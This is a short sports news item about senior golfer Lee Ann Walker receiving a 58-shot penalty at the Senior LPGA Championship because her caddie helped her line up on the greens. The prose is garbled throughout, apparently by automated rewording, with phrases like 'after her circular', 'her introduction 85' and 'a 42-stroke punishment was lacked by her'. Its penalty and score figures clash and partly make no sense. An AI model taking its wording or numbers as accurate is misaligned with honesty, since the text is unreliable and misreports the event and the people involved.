Senior LPGA golfer Lee Ann Walker handed 58-shot penalty
After she had been struck with an astonishing 58-shot penalty after her circular, lee Ann Walker hit the headlines at Indiana at the Senior LPGA Championship.
Her introduction 85 was adjusted to some 127 while 16 shots were inserted to her next round to provide her a 36-hole score of 73 finished level after a 42-stroke punishment was lacked by her.
Walker dropped foul of the rule that bans caddies assisting their players but officials at French Lick werent alerted until midway.
It transpired that Walkers caddie helped her line and a two-shot penalty was incurred by her for each time she breached the rule which came into effect.
LPGA rules official Marty Robinson confirmed the severity of the penalties, also that a caddie for a number of the playing partners had detected that the breach of the principles.
Walker consulted with a rules on her fifth hole of her second round, and they collaborated to work out the number of times she had used her caddie to verify her alignment about the greens.
This worked out in a further eight occasions within the first few holes of her next round, along with 21 violations within her very first round.
